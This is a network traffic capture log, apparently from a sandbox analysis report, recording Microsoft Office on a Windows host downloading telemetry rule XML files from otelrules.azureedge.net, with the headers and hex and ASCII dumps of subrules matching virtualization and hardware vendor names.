2024-12-08 18:53:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:30 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 90a1454b-001e-0079-3203-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185330Z-r1cf579d778x776bhC1EWRdk800000000640000000006tv8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:30 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:30 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:30 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 8a885dcd-801e-0078-280b-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185330Z-r1cf579d77867vg8hC1EWR8knc00000005z0000000006wn4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:30 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:30 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:30 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 337dc70d-a01e-0053-5e05-488603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185330Z-r1cf579d778qgtz2hC1EWRmgks00000005zg000000004wy7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:30 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:30 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:30 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: e27c4e9c-301e-0099-680b-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185330Z-r1cf579d778xq4f9hC1EWRx41g0000000620000000001r79 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:30 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:32 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:32 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 32d588ee-b01e-003e-0206-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185332Z-r1cf579d778qgtz2hC1EWRmgks00000005wg000000009e8b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:32 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:32 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:32 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: a215b4dd-e01e-0071-4e03-4808e7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185332Z-r1cf579d778zvkpnhC1EWRv23g00000006a000000000ap2k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:32 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:32 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:32 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 7e558585-401e-0047-1037-498597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185332Z-r1cf579d778z4wflhC1EWRa3h00000000670000000004gfm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:32 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:32 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:32 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 09205d62-a01e-0021-3a05-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185332Z-r1cf579d7786c2tshC1EWRr1gc00000005pg00000000b78z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:32 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49832	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:32 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:32 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 2750dbad-b01e-003d-064a-49d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185332Z-r1cf579d778d5zkmhC1EWRk6h800000006q0000000001mc6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:32 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:34 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:34 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 4c7743ed-001e-0082-4b03-485880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185334Z-r1cf579d7786c2tshC1EWRr1gc00000005pg00000000b7cn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:34 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:34 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:34 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: dfbdfb26-501e-0016-5926-49181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185334Z-r1cf579d778t6txphC1EWRsd4400000006rg000000000hgk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:34 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49835	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:35 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:35 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: d1595916-d01e-00a1-2a26-4935b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185335Z-r1cf579d77867vg8hC1EWR8knc00000005wg0000000091t4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:35 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49836	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
